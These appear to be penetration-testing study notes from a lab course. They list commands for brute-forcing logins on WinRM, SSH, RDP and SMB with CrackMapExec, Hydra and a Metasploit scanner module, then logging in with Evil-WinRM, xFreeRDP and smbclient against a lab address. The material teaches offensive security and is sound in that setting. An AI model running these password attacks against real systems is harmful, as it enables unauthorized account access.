A handy tool that we can use for our password attacks is CrackMapExec, which can also be used for other protocols such as SMB, LDAP, MSSQL, and others. We recommend reading the official documentation for this tool to become familiar with it.
WinRM Windows Remote Management Protocols
It is a network protocol based on XML web services using the Simple Object Access Protocol (SOAP) used for remote management of Windows systems. It takes care of the communication between Web-Based Enterprise Management (WBEM) and the Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM).
CrackMapExec
Installing CrackMapExec
sudo apt-get -y install crackmapexecNote: Alternatively, we can install NetExec to follow along using sudo apt-get -y install netexec
Using CrackMapExec
Help:
crackmapexec -hCrackMapExec Protocol-Specific Help:
crackmapexec smb -hCrackMapExec Usage:
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>example:
crackmapexec winrm 10.129.42.197 -u user.list -p password.listFor WinRM:
Evil-WinRM
Installing Evil-WinRM:
sudo gem install evil-winrmUsage:
evil-winrm -i <target-IP> -u <username> -p <password>example:
evil-winrm -i 10.129.42.197 -u user -p passwordSSH Linux Remote Management Protocols
Using Hydra to bruteforce ssh
hydra -L user.list -P password.list ssh://10.129.42.197RDP Windows Remote Management Protocols
Port : 3389
Using Hydra to bruteforce rdp
hydra -L user.list -P password.list rdp://10.129.42.197xFreeRDP (from linux)
xfreerdp /v:<target-IP> /u:<username> /p:<password>example:
xfreerdp /v:10.129.42.197 /u:user /p:passwordSMB SMB
Hydra - SMB
hydra -L user.list -P password.list smb://10.129.42.197may get
[ERROR] invalid reply from target smb://10.129.42.197:445/This is because we most likely have an outdated version of THC-Hydra that cannot handle SMBv3 replies. To work around this problem, we can manually update and recompile hydra or use another very powerful tool, the Metasploit framework.
Metasploit Framework
use auxiliary/scanner/smb/smb_loginset user_file user.listset pass_file password.listset rhosts 10.129.42.197runCrackMapExec
crackmapexec smb 10.129.42.197 -u "user" -p "password" --sharesSmbclient
smbclient -U user \\\\10.129.42.197\\SHARENAME